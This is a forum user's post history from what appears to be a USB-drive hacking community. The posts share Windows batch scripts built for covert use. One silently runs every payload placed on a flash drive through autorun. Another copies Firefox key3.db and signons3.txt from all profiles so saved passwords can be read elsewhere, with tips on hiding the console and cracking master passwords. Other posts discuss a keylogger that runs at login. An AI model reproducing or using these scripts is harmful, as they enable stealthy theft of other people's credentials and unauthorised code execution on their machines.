Jump to content

Ddes

Members
  • Posts

    5
  • Joined

  • Last visited

Everything posted by Ddes

  1. I got fed up with constantly re-flashing my drive, so I wrote this little batch script. Just set it up to be autorun in the usual way. If you want it to be silent, compile it with quickbfc as a ghost application. What it does is, provided you have a file named "u3id.txt" at the root of your flash drive, execute all files in the folder "e" on that drive. So, provided the files aren't deleted by an antivirus, it's extremely easy to change your working payload, even on a machine without the universal customizer - just change which exes or bats are in that folder. A few caveats: 1. Folders will try to execute and fail, and the program will continue. Still, you probably don't want to put folders in the "e" folder. 2. It'll open any files in the folder, so make sure all you have is programs. Execution will stop until the files are closed. 3. Execution will not continue until previous items have finished executing, so order file names with higher-priority items first and anything that takes a long time to execute last. On linux I'd use nohup to solve this; I know of no windows equivalent. If anyone does that'd be grand. 4. Batch scripts and command-line programs will run within the window, meaning if the script is silent the batch files will be too. 5. Nothing in subfolders will execute. 6. Spaces and semicolons in file names may or may not work. @echo off for %%i in (Z Y X W V U T S R Q P O N M L K J I H G F E D C B A) do ( if exist "%%i:\u3id.txt" ( set fd=%%i:\e\ goto drv ) ) goto end :drv for /f "delims=;" %%i in ('dir /B "%fd%"') do ( %fd%%%i ) :end
  2. Ddes

    XXSlurp

    XXCOPY requires installation on first run, making this a lot less useful.
  3. Ddes

    Tools

    I created my own version of the Firefox password program. Two main improvements - first, it dumps the files for all the profiles, and second, you can specify where to put the files. Dingleberries, I haven't looked very hard, but as far as I've seen you can't launch programs from the other partition (without some work - I did actually come up with a solution to that, but I have my own method now and I'm not sure the way I'm thinking of would work in this situation anyway - it might be looking to create the file in the same directory as autorun.ini, which does have to be on the read-only partition). The keylogger does something that - if you create a batch script to launch the exe, the winsysfile.dll is put in the same directory as the batch script regardless of where the exe is.
  4. This is a simple batch script based on a tool by DingleBerries. The idea is that it copies the files necessary to view passwords in firefox, so you can view them on another machine. How to use: Run the batch file or exe. You have to pass it a path to put the files. From the command line, for example, you'd do "ddes_ff.bat C:\foldername\subdirectory". (See alt version for a hardcoded path.) Create a new firefox profile on your machine. (Google, if you don't know how.) Copy "key3.db" and "signon.txt" into the folder for that profile (eg. into hzt7v9e5.tmp - if you can't find the right folder, google.) Start Firefox with that profile (again, google) Go to preferences - security - saved passwords to view. If there's a master password, try FireMaster. If you want these to run silently (ie no black window), I'd recommend using HideConsole.exe from the PocketKnife. Also, the free version of Quick Batch File Compiler can create a standalone .exe which does not display anything onscreen. Batch script: @ECHO OFF for /f "delims=;" %%i in ('dir /B "%appdata%\Mozilla\Firefox\Profiles"') do ( md "%1\%%i" copy "%appdata%\Mozilla\Firefox\Profiles\%%i\key3.db" "%1\%%i\key3.db" copy "%appdata%\Mozilla\Firefox\Profiles\%%i\signons3.txt" "%1\%%i\signons3.txt" ) Alt version (hardcoded path): @ECHO OFF for /f "delims=;" %%i in ('dir /B "%appdata%\Mozilla\Firefox\Profiles"') do ( md "C:\dumdir\%%i" copy "%appdata%\Mozilla\Firefox\Profiles\%%i\key3.db" "C:\dumdir\%%i\key3.db" copy "%appdata%\Mozilla\Firefox\Profiles\%%i\signons3.txt" "C:\dumdir\%%i\signons3.txt" ) Note that this version does not require any additional parameters. You can just save it and run it and it will put the files in C:\dumpdir. U3 version coming shortly.
  5. Ddes

    Tools

    Hey, these are great. One specific feature request - I'd love to be able to specify the path of the log file for the keylogger, perhaps with a command-line flag. I'm trying to set it up to run at login, but the file isn't created in the same place as the .exe. Same for Firefox applications, actually - they don't work from the U3 drive, because even if you put the .exe in the main partition and launch it with a batch script it tries and fails to put the files in the read-only U3 partition. There might be a workaround - some other way of launching the .exe so it got the path correct - but I don't know what it might be. On the other hand, I may be able to write my own batch script which works for this. I'll get back to this one.
×
×
  • Create New...